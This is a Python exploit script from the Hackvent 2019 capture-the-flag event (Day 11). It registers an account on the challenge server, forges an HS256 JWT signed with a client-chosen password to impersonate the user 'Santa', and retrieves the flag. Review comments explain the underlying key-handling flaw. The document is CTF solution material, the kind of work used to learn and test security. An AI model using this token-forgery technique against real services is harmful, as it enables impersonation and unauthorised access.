Hackvent_2019/Day 11/exploit.py

#!/usr/bin/python
import jwt
import requests
import sys
import prompt
import json
import time
# Base URL of the challenge service. Note the scheme: every request this
# script makes, including the password and the token, travels over plain HTTP.
URL = "http://whale.hacking-lab.com:10101"

# Account name: the first command-line argument when one is given, otherwise
# asked for interactively.
if len(sys.argv) >= 2:
    USERNAME = sys.argv[1]
else:
    USERNAME = prompt.string("Username: ")

# Fixed placeholder value. It is sent as the registration password and is
# also the HS256 signing key used in getFlag().
PASSWORD = "AAAAAAAAAAAAAAAA"
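def registerUser():
    """Register USERNAME with PASSWORD at the service's /fsja/register endpoint.

    Returns None when the server answers 200, or 409 with the error message
    "User already exists". For any other answer the status line and the
    response body are printed and the process exits with status 1.
    """
    payload = json.dumps({"username": USERNAME, "password": PASSWORD})
    # Without a timeout, requests waits indefinitely on an unresponsive host.
    res = requests.post(
        URL + "/fsja/register",
        data=payload,
        headers={"Content-Type": "application/json"},
        timeout=10,
    )
    if res.status_code == 200:
        return

    data = res.text
    if res.status_code == 409:
        # The 409 body is expected to be a JSON object, but an intermediary
        # or a failing backend may answer with something else. Fall through
        # to the error report instead of dying with a traceback.
        try:
            message = json.loads(data).get("errorMessage")
        except (ValueError, AttributeError):
            message = None
        if message == "User already exists":
            return

    print("Server returned %d %s" % (res.status_code, res.reason))
    print(data)
    # sys.exit rather than exit(): the latter is injected by the site module
    # and is missing when the interpreter runs with -S.
    sys.exit(1)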
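def getFlag():
    """Call /fsja/random with a locally signed HS256 token and print the "joke" field.

    The token carries a "user" object (username "Santa", password PASSWORD,
    platinum False) and an "exp" claim one hour ahead. On any status other
    than 200 or 201 the status line and body are printed and the process
    exits with status 1.

    NOTE(review): the token is signed here with PASSWORD, a value chosen by
    this script. If the service accepts it, the server is presumably
    verifying signatures with a key taken from client-controlled data
    (possibly the password claim itself); confirm against the service.
    Signing keys should be server-side secrets that no request field can
    influence, and identity claims should be checked against stored state.
    """
    claims = {
        "user": {
            "username": "Santa",
            "password": PASSWORD,
            "platinum": False,
        },
        "exp": time.time() + 60 * 60,
    }
    token = jwt.encode(claims, PASSWORD, algorithm="HS256")
    # PyJWT 1.x returns bytes and 2.x returns str. Calling .decode()
    # unconditionally raises AttributeError on 2.x.
    if isinstance(token, bytes):
        token = token.decode("UTF-8")

    # A JWT consists only of URL-safe characters, so passing it via params
    # produces the same query string as manual formatting. The timeout keeps
    # the call from blocking forever.
    res = requests.get(URL + "/fsja/random", params={"token": token}, timeout=10)
    if res.status_code not in (200, 201):
        print("Server returned %d %s" % (res.status_code, res.reason))
        print(res.text)
        # sys.exit rather than exit(): the latter is injected by the site
        # module and is missing when the interpreter runs with -S.
        sys.exit(1)

    data = res.text
    print(json.loads(data)["joke"])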
if __name__ == "__main__":
    # Run the two steps in order: register the account, then request the joke.
    for step in (registerUser, getFlag):
        step()